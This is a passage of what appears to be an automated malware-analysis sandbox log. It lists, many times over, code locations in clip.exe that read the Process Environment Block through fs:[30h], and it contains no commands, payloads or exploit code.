          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0430C427 mov eax, dword ptr fs:[00000030h] 22_2_0430C427
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_04396420 mov eax, dword ptr fs:[00000030h] 22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_04397410 mov eax, dword ptr fs:[00000030h] 22_2_04397410
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_04348402 mov eax, dword ptr fs:[00000030h] 22_2_04348402
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0433340D mov eax, dword ptr fs:[00000030h] 22_2_0433340D
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_043E547F mov eax, dword ptr fs:[00000030h] 22_2_043E547F
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0433A470 mov eax, dword ptr fs:[00000030h] 22_2_0433A470
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_04311460 mov eax, dword ptr fs:[00000030h] 22_2_04311460
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0432F460 mov eax, dword ptr fs:[00000030h] 22_2_0432F460
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0439C460 mov ecx, dword ptr fs:[00000030h] 22_2_0439C460
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0433245A mov eax, dword ptr fs:[00000030h] 22_2_0433245A
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0430645D mov eax, dword ptr fs:[00000030h] 22_2_0430645D
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_043CF453 mov eax, dword ptr fs:[00000030h] 22_2_043CF453
          Source: C:\Windows\SysWOW64\clip.exe Code function: 22_2_0431B440 mov eax, dword ptr fs:[00000030h] 22_2_0431B440
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043434B0 mov eax, dword ptr fs:[00000030h]22_2_043434B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043444B0 mov ecx, dword ptr fs:[00000030h]22_2_043444B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439A4B0 mov eax, dword ptr fs:[00000030h]22_2_0439A4B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043164AB mov eax, dword ptr fs:[00000030h]22_2_043164AB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B480 mov eax, dword ptr fs:[00000030h]22_2_0430B480
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04319486 mov eax, dword ptr fs:[00000030h]22_2_04319486
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04319486 mov eax, dword ptr fs:[00000030h]22_2_04319486
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043104E5 mov ecx, dword ptr fs:[00000030h]22_2_043104E5
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043B94E0 mov eax, dword ptr fs:[00000030h]22_2_043B94E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E54DB mov eax, dword ptr fs:[00000030h]22_2_043E54DB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434D530 mov eax, dword ptr fs:[00000030h]22_2_0434D530
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434D530 mov eax, dword ptr fs:[00000030h]22_2_0434D530
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E5537 mov eax, dword ptr fs:[00000030h]22_2_043E5537
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CB52F mov eax, dword ptr fs:[00000030h]22_2_043CB52F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04347505 mov eax, dword ptr fs:[00000030h]22_2_04347505
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04347505 mov ecx, dword ptr fs:[00000030h]22_2_04347505
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434B570 mov eax, dword ptr fs:[00000030h]22_2_0434B570
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434B570 mov eax, dword ptr fs:[00000030h]22_2_0434B570
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B562 mov eax, dword ptr fs:[00000030h]22_2_0430B562
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434656A mov eax, dword ptr fs:[00000030h]22_2_0434656A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434656A mov eax, dword ptr fs:[00000030h]22_2_0434656A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434656A mov eax, dword ptr fs:[00000030h]22_2_0434656A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04318550 mov eax, dword ptr fs:[00000030h]22_2_04318550
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04318550 mov eax, dword ptr fs:[00000030h]22_2_04318550
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF5BE mov eax, dword ptr fs:[00000030h]22_2_043CF5BE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043345B1 mov eax, dword ptr fs:[00000030h]22_2_043345B1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043345B1 mov eax, dword ptr fs:[00000030h]22_2_043345B1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043905A7 mov eax, dword ptr fs:[00000030h]22_2_043905A7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043905A7 mov eax, dword ptr fs:[00000030h]22_2_043905A7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043905A7 mov eax, dword ptr fs:[00000030h]22_2_043905A7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E59C mov eax, dword ptr fs:[00000030h]22_2_0434E59C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439B594 mov eax, dword ptr fs:[00000030h]22_2_0439B594
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439B594 mov eax, dword ptr fs:[00000030h]22_2_0439B594
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04312582 mov eax, dword ptr fs:[00000030h]22_2_04312582
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04312582 mov ecx, dword ptr fs:[00000030h]22_2_04312582
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04344588 mov eax, dword ptr fs:[00000030h]22_2_04344588
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430758F mov eax, dword ptr fs:[00000030h]22_2_0430758F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430758F mov eax, dword ptr fs:[00000030h]22_2_0430758F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430758F mov eax, dword ptr fs:[00000030h]22_2_0430758F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043125E0 mov eax, dword ptr fs:[00000030h]22_2_043125E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C5ED mov eax, dword ptr fs:[00000030h]22_2_0434C5ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C5ED mov eax, dword ptr fs:[00000030h]22_2_0434C5ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043165D0 mov eax, dword ptr fs:[00000030h]22_2_043165D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A5D0 mov eax, dword ptr fs:[00000030h]22_2_0434A5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A5D0 mov eax, dword ptr fs:[00000030h]22_2_0434A5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D5D0 mov eax, dword ptr fs:[00000030h]22_2_0438D5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D5D0 mov ecx, dword ptr fs:[00000030h]22_2_0438D5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E35D7 mov eax, dword ptr fs:[00000030h]22_2_043E35D7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E35D7 mov eax, dword ptr fs:[00000030h]22_2_043E35D7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E35D7 mov eax, dword ptr fs:[00000030h]22_2_043E35D7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043395DA mov eax, dword ptr fs:[00000030h]22_2_043395DA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043455C0 mov eax, dword ptr fs:[00000030h]22_2_043455C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E55C9 mov eax, dword ptr fs:[00000030h]22_2_043E55C9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E5CF mov eax, dword ptr fs:[00000030h]22_2_0434E5CF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E5CF mov eax, dword ptr fs:[00000030h]22_2_0434E5CF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E5636 mov eax, dword ptr fs:[00000030h]22_2_043E5636
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04346620 mov eax, dword ptr fs:[00000030h]22_2_04346620
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04348620 mov eax, dword ptr fs:[00000030h]22_2_04348620
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432E627 mov eax, dword ptr fs:[00000030h]22_2_0432E627
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431262C mov eax, dword ptr fs:[00000030h]22_2_0431262C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04313616 mov eax, dword ptr fs:[00000030h]22_2_04313616
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04313616 mov eax, dword ptr fs:[00000030h]22_2_04313616
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352619 mov eax, dword ptr fs:[00000030h]22_2_04352619
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E609 mov eax, dword ptr fs:[00000030h]22_2_0438E609
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04341607 mov eax, dword ptr fs:[00000030h]22_2_04341607
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434F603 mov eax, dword ptr fs:[00000030h]22_2_0434F603
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04342674 mov eax, dword ptr fs:[00000030h]22_2_04342674
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D866E mov eax, dword ptr fs:[00000030h]22_2_043D866E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D866E mov eax, dword ptr fs:[00000030h]22_2_043D866E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A660 mov eax, dword ptr fs:[00000030h]22_2_0434A660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A660 mov eax, dword ptr fs:[00000030h]22_2_0434A660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04349660 mov eax, dword ptr fs:[00000030h]22_2_04349660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04349660 mov eax, dword ptr fs:[00000030h]22_2_04349660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432C640 mov eax, dword ptr fs:[00000030h]22_2_0432C640
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043076B2 mov eax, dword ptr fs:[00000030h]22_2_043076B2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043076B2 mov eax, dword ptr fs:[00000030h]22_2_043076B2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043076B2 mov eax, dword ptr fs:[00000030h]22_2_043076B2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043466B0 mov eax, dword ptr fs:[00000030h]22_2_043466B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C6A6 mov eax, dword ptr fs:[00000030h]22_2_0434C6A6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430D6AA mov eax, dword ptr fs:[00000030h]22_2_0430D6AA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430D6AA mov eax, dword ptr fs:[00000030h]22_2_0430D6AA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04314690 mov eax, dword ptr fs:[00000030h]22_2_04314690
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04314690 mov eax, dword ptr fs:[00000030h]22_2_04314690
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043906F1 mov eax, dword ptr fs:[00000030h]22_2_043906F1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043906F1 mov eax, dword ptr fs:[00000030h]22_2_043906F1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E6F2 mov eax, dword ptr fs:[00000030h]22_2_0438E6F2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CD6F0 mov eax, dword ptr fs:[00000030h]22_2_043CD6F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433D6E0 mov eax, dword ptr fs:[00000030h]22_2_0433D6E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433D6E0 mov eax, dword ptr fs:[00000030h]22_2_0433D6E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A36EE mov eax, dword ptr fs:[00000030h]22_2_043A36EE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043436EF mov eax, dword ptr fs:[00000030h]22_2_043436EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B6C0 mov eax, dword ptr fs:[00000030h]22_2_0431B6C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D16CC mov eax, dword ptr fs:[00000030h]22_2_043D16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A6C7 mov ebx, dword ptr fs:[00000030h]22_2_0434A6C7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A6C7 mov eax, dword ptr fs:[00000030h]22_2_0434A6C7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF6C7 mov eax, dword ptr fs:[00000030h]22_2_043CF6C7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043416CF mov eax, dword ptr fs:[00000030h]22_2_043416CF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309730 mov eax, dword ptr fs:[00000030h]22_2_04309730
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309730 mov eax, dword ptr fs:[00000030h]22_2_04309730
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04345734 mov eax, dword ptr fs:[00000030h]22_2_04345734
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043EB73C mov eax, dword ptr fs:[00000030h]22_2_043EB73C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434273C mov eax, dword ptr fs:[00000030h]22_2_0434273C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434273C mov ecx, dword ptr fs:[00000030h]22_2_0434273C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434273C mov eax, dword ptr fs:[00000030h]22_2_0434273C
